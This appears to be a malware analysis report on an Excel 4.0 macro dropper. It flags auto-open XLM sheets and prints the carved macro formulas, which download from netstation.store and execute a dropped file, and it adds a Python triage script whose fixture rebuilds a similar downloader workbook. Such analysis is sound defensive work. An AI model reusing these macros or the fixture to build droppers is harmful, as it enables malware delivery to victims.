Verdict: MALICIOUS
Risk score: 262
Heuristics (6)

- Excel 4.0 macro sheet (2 sheets) | critical | 3 related findings | OOXML_XLM_MACROSHEET
  The spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened the XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- Excel 4.0 Auto_Open defined name | critical | OOXML_XLM_AUTOOPEN_DEFINEDNAME
  The workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: the defined name points at the first cell of the macro, and Excel runs it as soon as the user enables content.
- Dangerous XLM formula APIs: HALT, CALL, EXEC, RUN | critical | OOXML_XLM_DANGEROUS_FN
  The macro sheet uses XLM formula functions that reach directly into Win32 (=CALL, =EXEC; the rule also covers =REGISTER and =FORMULA) together with the control-flow functions =RUN and =HALT, which chain macro sheets and stop execution. These are the primitives used to download payloads, write files and start processes from an XLM macro without invoking VBA.
- Binary XLM macro sheet with WinAPI/download strings | critical | OOXML_XLM_BINARY_WINAPI_STRINGS
  An Excel 4.0 macro sheet stored as BIFF12/XLSB binary data contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse. Note that the two sheets carved below are XML macrosheets, so for this sample the formula previews are the better place to confirm what is actually called.
- Macro/content-enable lure | medium | SE_ENABLE_LURE
  The document instructs the user to enable macros or editing, the usual lure malware droppers use to get a victim to click past Office macro security settings.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://netstation.store/img/superts.php (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
  Only the first entry is a network indicator. The five schemas.openxmlformats.org / schemas.microsoft.com entries are XML namespace URIs declared on the macrosheet root elements (visible as xmlns attributes in the previews below) and are present in every OOXML workbook.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1400 bytes | 97c0a38b067b7bcdf25006ad4152a4f3d342849f2138e7a8c461771c97adea9d |
| xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 6311 bytes | 8c3ab64232e7a96fad94d6875391b2e5005c12f4027458afcd9112ec806360cd |

Preview of xlm_sheet_00.xml (first 1,000 lines of the extracted sheet; rows split one per line for readability):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
<dimension ref="FJ330:FK335"/>
<sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
<sheetData>
<row r="330" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ330" s="1"/><c r="FK330" s="1"/></row>
<row r="331" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ331" s="1"/><c r="FK331" s="1"/></row>
<row r="332" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ332" s="1"/><c r="FK332" s="1"/></row>
<row r="333" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ333" s="1" t="b"><f>HALT()</f><v>1</v></c><c r="FK333" s="1"/></row>
<row r="334" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ334" s="1"/><c r="FK334" s="1"/></row>
<row r="335" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ335" s="1"/><c r="FK335" s="1"/></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
```

This sheet holds a single formula, HALT() in FJ333, and exists only as the target of the RUN('Doc2'!FJ333) call in the other sheet: once the payload has been started, execution jumps here and stops cleanly.

Preview of xlm_sheet_01.xml (first 1,000 lines of the extracted sheet; rows split one per line for readability):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
<dimension ref="A11:AG52"/>
<sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
<cols><col min="1" max="26" width="4.44140625" style="2"/><col min="27" max="27" width="4.44140625" style="2" customWidth="1"/><col min="28" max="16384" width="4.44140625" style="2"/></cols>
<sheetData>
<row r="11" spans="27:33" x14ac:dyDescent="0.3"><c r="AA11" s="1"/><c r="AB11" s="1"/><c r="AC11" s="1"/><c r="AD11" s="1"/><c r="AE11" s="1"/><c r="AF11" s="1"/><c r="AG11" s="1"/></row>
<row r="12" spans="27:33" x14ac:dyDescent="0.3"><c r="AA12" s="1"/><c r="AB12" s="1"/><c r="AC12" s="1"/><c r="AD12" s="1"/><c r="AE12" s="1"/><c r="AF12" s="1"/><c r="AG12" s="1"/></row>
<row r="13" spans="27:33" x14ac:dyDescent="0.3"><c r="AA13" s="1"/><c r="AB13" s="1"/><c r="AC13" s="1"/><c r="AD13" s="1"/><c r="AE13" s="1"/><c r="AF13" s="1"/><c r="AG13" s="1"/></row>
<row r="14" spans="27:33" x14ac:dyDescent="0.3"><c r="AA14" s="1"><f>CALL('Doc1'!AC16&'Doc1'!AC17,'Doc1'!AD16&'Doc1'!AD17,"JCJ",'Doc1'!AF16,0)</f><v>1</v></c><c r="AB14" s="1"/><c r="AC14" s="1"/><c r="AD14" s="1"/><c r="AE14" s="1"/><c r="AF14" s="1"/><c r="AG14" s="1"/></row>
<row r="15" spans="27:33" x14ac:dyDescent="0.3"><c r="AA15" s="1"><f>CALL('Doc1'!AC19&'Doc1'!AC20,'Doc1'!AD19&'Doc1'!AD20&'Doc1'!AD21&'Doc1'!AD22,'Doc1'!AE19&'Doc1'!AE20,0,A50,'Doc1'!AF16&'Doc1'!AF20,0,0)</f><v>0</v></c><c r="AB15" s="1"/><c r="AC15" s="1"/><c r="AD15" s="1"/><c r="AE15" s="1"/><c r="AF15" s="1"/><c r="AG15" s="1"/></row>
<row r="16" spans="27:33" x14ac:dyDescent="0.3"><c r="AA16" s="1" t="e"><f>CALL("INSENG","DownloadFile","BCCJ",A50,AF16&AF20,1)</f><v>#NUM!</v></c><c r="AB16" s="1"/><c r="AC16" s="1" t="s"><v>0</v></c><c r="AD16" s="1" t="s"><v>2</v></c><c r="AE16" s="1" t="s"><v>4</v></c><c r="AF16" s="1" t="s"><v>5</v></c><c r="AG16" s="1"/></row>
<row r="17" spans="27:33" x14ac:dyDescent="0.3"><c r="AA17" s="1"><f>EXEC('Doc1'!AC24&'Doc1'!AC25&"C:\orwkw\kkfm.reo"&'Doc1'!AD24&'Doc1'!AD25)</f><v>33</v></c><c r="AB17" s="1"/><c r="AC17" s="1" t="s"><v>1</v></c><c r="AD17" s="1" t="s"><v>3</v></c><c r="AE17" s="1"/><c r="AF17" s="1"/><c r="AG17" s="1"/></row>
<row r="18" spans="27:33" x14ac:dyDescent="0.3"><c r="AA18" s="1" t="b"><f>RUN('Doc2'!FJ333)</f><v>0</v></c><c r="AB18" s="1"/><c r="AC18" s="1"/><c r="AD18" s="1"/><c r="AE18" s="1"/><c r="AF18" s="1"/><c r="AG18" s="1"/></row>
<row r="19" spans="27:33" x14ac:dyDescent="0.3"><c r="AA19" s="1"/><c r="AB19" s="1"/><c r="AC19" s="1" t="s"><v>6</v></c><c r="AD19" s="1" t="s"><v>6</v></c><c r="AE19" s="1" t="s"><v>9</v></c><c r="AF19" s="1"/><c r="AG19" s="1"/></row>
<row r="20" spans="27:33" x14ac:dyDescent="0.3"><c r="AA20" s="1"/><c r="AB20" s="1"/><c r="AC20" s="1" t="s"><v>15</v></c><c r="AD20" s="1" t="s"><v>16</v></c><c r="AE20" s="1" t="s"><v>10</v></c><c r="AF20" s="1" t="s"><v>17</v></c><c r="AG20" s="1"/></row>
<row r="21" spans="27:33" x14ac:dyDescent="0.3"><c r="AA21" s="1"/><c r="AB21" s="1"/><c r="AC21" s="1"/><c r="AD21" s="1" t="s"><v>7</v></c><c r="AE21" s="1"/><c r="AF21" s="1"/><c r="AG21" s="1"/></row>
<row r="22" spans="27:33" x14ac:dyDescent="0.3"><c r="AA22" s="1"/><c r="AB22" s="1"/><c r="AC22" s="1"/><c r="AD22" s="1" t="s"><v>8</v></c><c r="AE22" s="1"/><c r="AF22" s="1"/><c r="AG22" s="1"/></row>
<row r="23" spans="27:33" x14ac:dyDescent="0.3"><c r="AA23" s="1"/><c r="AB23" s="1"/><c r="AC23" s="1"/><c r="AD23" s="1"/><c r="AE23" s="1"/><c r="AF23" s="1"/><c r="AG23" s="1"/></row>
<row r="24" spans="27:33" x14ac:dyDescent="0.3"><c r="AA24" s="1"/><c r="AB24" s="1"/><c r="AC24" s="1" t="s"><v>11</v></c><c r="AD24" s="1" t="s"><v>13</v></c><c r="AE24" s="1"/><c r="AF24" s="1"/><c r="AG24" s="1"/></row>
<row r="25" spans="27:33" x14ac:dyDescent="0.3"><c r="AA25" s="1"/><c r="AB25" s="1"/><c r="AC25" s="1" t="s"><v>12</v></c><c r="AD25" s="1" t="s"><v>14</v></c><c r="AE25" s="1"/><c r="AF25" s="1"/><c r="AG25" s="1"/></row>
<row r="26" spans="27:33" x14ac:dyDescent="0.3"><c r="AA26" s="1"/><c r="AB26" s="1"/><c r="AC26" s="1"/><c r="AD26" s="1"/><c r="AE26" s="1"/><c r="AF26" s="1"/><c r="AG26" s="1"/></row>
<row r="27" spans="27:33" x14ac:dyDescent="0.3"><c r="AA27" s="1"/><c r="AB27" s="1"/><c r="AC27" s="1"/><c r="AD27" s="1"/><c r="AE27" s="1"/><c r="AF27" s="1"/><c r="AG27" s="1"/></row>
<row r="28" spans="27:33" x14ac:dyDescent="0.3"><c r="AA28" s="1"/><c r="AB28" s="1"/><c r="AC28" s="1"/><c r="AD28" s="1"/><c r="AE28" s="1"/><c r="AF28" s="1"/><c r="AG28" s="1"/></row>
<row r="29" spans="27:33" x14ac:dyDescent="0.3"><c r="AA29" s="1"/><c r="AB29" s="1"/><c r="AC29" s="1"/><c r="AD29" s="1"/><c r="AE29" s="1"/><c r="AF29" s="1"/><c r="AG29" s="1"/></row>
<row r="30" spans="27:33" x14ac:dyDescent="0.3"><c r="AA30" s="1"/><c r="AB30" s="1"/><c r="AC30" s="1"/><c r="AD30" s="1"/><c r="AE30" s="1"/><c r="AF30" s="1"/><c r="AG30" s="1"/></row>
<row r="31" spans="27:33" x14ac:dyDescent="0.3"><c r="AA31" s="1"/><c r="AB31" s="1"/><c r="AC31" s="1"/><c r="AD31" s="1"/><c r="AE31" s="1"/><c r="AF31" s="1"/><c r="AG31" s="1"/></row>
<row r="46" spans="1:1" x14ac:dyDescent="0.3"><c r="A46" s="1"/></row>
<row r="47" spans="1:1" x14ac:dyDescent="0.3"><c r="A47" s="1"/></row>
<row r="48" spans="1:1" x14ac:dyDescent="0.3"><c r="A48" s="1"/></row>
<row r="49" spans="1:1" x14ac:dyDescent="0.3"><c r="A49" s="1"/></row>
<row r="50" spans="1:1" x14ac:dyDescent="0.3"><c r="A50" s="1" t="s"><v>29</v></c></row>
<row r="51" spans="1:1" x14ac:dyDescent="0.3"><c r="A51" s="1"/></row>
<row r="52" spans="1:1" x14ac:dyDescent="0.3"><c r="A52" s="1"/></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
```

Reading the macro: the code lives in column AA, rows 14-18, and is executed top to bottom. Every library name, function name and path argument except two literals is assembled at run time by concatenating (&) cells that hold shared-string references (t="s"), so the previews alone do not show which APIs the first two CALLs reach; that needs xl/sharedStrings.xml, which this report does not carve. What is visible in clear: the third CALL invokes DownloadFile from INSENG (inseng.dll, the Windows Internet Install Engine), the EXEC line builds a command line around the literal path C:\orwkw\kkfm.reo, and the URL argument of both download calls is A50 (shared string 29); the only external URL the report extracted from the shared strings is http://netstation.store/img/superts.php. The final RUN('Doc2'!FJ333) hands control to the HALT() in the other sheet. The cached cell values (<v>1</v>, <v>33</v>, <v>#NUM!</v>) are whatever Excel last stored when the author saved the file, not results of execution in the sandbox.
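The three XLM findings above (macro sheet present, _xlnm.Auto_Open defined name, CALL/EXEC formulas) and the cell-concatenation pattern in the sheet1 preview can be reproduced with a short static triage script. The following is an added example, not the analyzer's code and not part of this report: it opens an OOXML workbook from bytes, maps sheet names to xl/macrosheets/ parts via xl/workbook.xml and its .rels, reads the Auto_Open/Auto_Close defined names, resolves t="s" cells through xl/sharedStrings.xml, flags CALL/EXEC/REGISTER/FORMULA formulas, and inlines references to data-only cells so that 'Doc1'!AC16&'Doc1'!AC17 folds into the string it builds. The workbook in build_fixture() is constructed for the example: its cell layout mirrors the report's sheets, but its shared strings, drop path and URL (http://example.invalid/stage2) are invented and are not the sample's.

```python
"""Static triage of Excel 4.0 (XLM) macro sheets in an OOXML workbook.
Added example, not the analyzer's code. build_fixture() is a constructed
workbook shaped like the report's sheets; its strings and URL are invented."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
PKG_RELS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
R_ID = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
DANGEROUS = {"CALL", "EXEC", "REGISTER", "FORMULA"}   # XLM functions that reach Win32 or write code
AUTO_NAMES = {"_xlnm.Auto_Open", "_xlnm.Auto_Close"}
# A1-style reference, optionally sheet-qualified; lookarounds keep it off names like LOG10( or ATAN2(.
CELL_REF = re.compile(r"(?<![A-Za-z0-9_])(?:'(?P<sheet>[^']+)'!)?(?P<cell>\$?[A-Z]{1,3}\$?\d+)(?![A-Za-z0-9_(])")
CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def shared_strings(z):
    if "xl/sharedStrings.xml" not in z.namelist():
        return []
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(MAIN + "t")) for si in root.iter(MAIN + "si")]


def macrosheet_parts(z):
    """sheet name -> zip path, for sheets whose relationship target lies under xl/macrosheets/."""
    rels_root = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    rels = {r.get("Id"): r.get("Target").lstrip("/") for r in rels_root.iter(PKG_RELS + "Relationship")}
    parts = {}
    for s in ET.fromstring(z.read("xl/workbook.xml")).iter(MAIN + "sheet"):
        target = rels.get(s.get(R_ID), "")
        if "macrosheets/" in target:
            parts[s.get("name")] = target if target.startswith("xl/") else "xl/" + target
    return parts


def auto_exec_names(z):
    """(name, target cell) for every _xlnm.Auto_Open / _xlnm.Auto_Close defined name."""
    root = ET.fromstring(z.read("xl/workbook.xml"))
    return [(d.get("name"), (d.text or "").strip()) for d in root.iter(MAIN + "definedName") if d.get("name") in AUTO_NAMES]


def parse_cells(xml_bytes, strings):
    """cell ref -> (formula or None, cached value); t="s" values are resolved through sharedStrings."""
    cells = {}
    for c in ET.fromstring(xml_bytes).iter(MAIN + "c"):
        f, v = c.find(MAIN + "f"), c.find(MAIN + "v")
        value = v.text if v is not None else None
        if c.get("t") == "s" and value is not None:
            value = strings[int(value)]
        cells[c.get("r")] = (f.text if f is not None else None, value)
    return cells


def resolve(formula, sheets, this_sheet):
    """Inline references to data-only cells and fold "a"&"b" into "ab".
    Cells that hold a formula stay symbolic: their cached <v> is a stale result, not data."""
    def sub(m):
        cells = sheets.get(m.group("sheet") or this_sheet, {})
        f, v = cells.get(m.group("cell").replace("$", ""), (None, None))
        return '"%s"' % v if f is None and v is not None else m.group(0)
    parts = re.split(r'("[^"]*")', formula)   # odd indices are string literals: leave them untouched
    s = "".join(p if i % 2 else CELL_REF.sub(sub, p) for i, p in enumerate(parts))
    while True:
        folded = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), s)
        if folded == s:
            return s
        s = folded


def scan(workbook_bytes):
    z = zipfile.ZipFile(io.BytesIO(workbook_bytes))
    strings = shared_strings(z)
    parts = macrosheet_parts(z)
    sheets = {name: parse_cells(z.read(path), strings) for name, path in parts.items()}
    findings = []
    for name, cells in sheets.items():
        for ref, (formula, _) in cells.items():
            head = re.match(r"\s*([A-Z.]+)\s*\(", formula or "")
            if head and head.group(1) in DANGEROUS:
                findings.append((name, ref, head.group(1), resolve(formula, sheets, name)))
    return {"auto_exec": auto_exec_names(z), "macrosheets": parts, "findings": findings}


def build_fixture():
    """Constructed workbook (not the sample): same cell layout as the report, invented strings and URL."""
    strings = ["URL", "MON", "URLDownload", "ToFileA", "C:\\Users\\Public\\", "stage2.exe",
               "http://example.invalid/stage2"]
    ns, xm = MAIN[1:-1], ' xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"'
    files = {   # Relationship Type attributes are omitted; the scanner keys on Target only.
        "xl/workbook.xml": '<workbook xmlns="%s" xmlns:r="%s"><sheets><sheet name="Doc1" sheetId="1" r:id="rId1"/>'
            '<sheet name="Doc2" sheetId="2" r:id="rId2"/></sheets><definedNames>'
            '<definedName name="_xlnm.Auto_Open">Doc1!$AA$14</definedName></definedNames></workbook>' % (ns, R_ID[1:-3]),
        "xl/_rels/workbook.xml.rels": '<Relationships xmlns="%s"><Relationship Id="rId1" Target="macrosheets/sheet1.xml"/>'
            '<Relationship Id="rId2" Target="macrosheets/sheet2.xml"/></Relationships>' % PKG_RELS[1:-1],
        "xl/sharedStrings.xml": '<sst xmlns="%s">%s</sst>' % (ns, "".join("<si><t>%s</t></si>" % s for s in strings)),
        "xl/macrosheets/sheet1.xml": '<xm:macrosheet xmlns="%s"%s><sheetData>'
            "<row r=\"14\"><c r=\"AA14\"><f>CALL('Doc1'!AC16&amp;'Doc1'!AC17,'Doc1'!AD16&amp;'Doc1'!AD17,\"JJCCJJ\",0,A50,'Doc1'!AF16&amp;'Doc1'!AF17,0,0)</f><v>0</v></c></row>"
            '<row r="16"><c r="AC16" t="s"><v>0</v></c><c r="AD16" t="s"><v>2</v></c><c r="AF16" t="s"><v>4</v></c></row>'
            "<row r=\"17\"><c r=\"AA17\"><f>EXEC('Doc1'!AF16&amp;'Doc1'!AF17)</f><v>33</v></c>"
            '<c r="AC17" t="s"><v>1</v></c><c r="AD17" t="s"><v>3</v></c><c r="AF17" t="s"><v>5</v></c></row>'
            "<row r=\"18\"><c r=\"AA18\" t=\"b\"><f>RUN('Doc2'!FJ333)</f><v>0</v></c></row>"
            '<row r="50"><c r="A50" t="s"><v>6</v></c></row></sheetData></xm:macrosheet>' % (ns, xm),
        "xl/macrosheets/sheet2.xml": '<xm:macrosheet xmlns="%s"%s><sheetData>'
            '<row r="333"><c r="FJ333" t="b"><f>HALT()</f><v>1</v></c></row></sheetData></xm:macrosheet>' % (ns, xm),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in files.items():
            z.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    report = scan(build_fixture())
    print("auto-exec names:", report["auto_exec"])
    print("macrosheets:", report["macrosheets"])
    for sheet, ref, fn, resolved in report["findings"]:
        print("%s!%s %s -> %s" % (sheet, ref, fn, resolved))
```

scan() takes the raw bytes of any .xlsm/.xlsx; running the file directly prints the resolved formulas for the fixture. References to cells that hold formulas (the HALT() target of RUN, for instance) are deliberately left symbolic, because inlining their cached <v> values would relabel code as data, and those cached values are whatever Excel last saved rather than anything that executed.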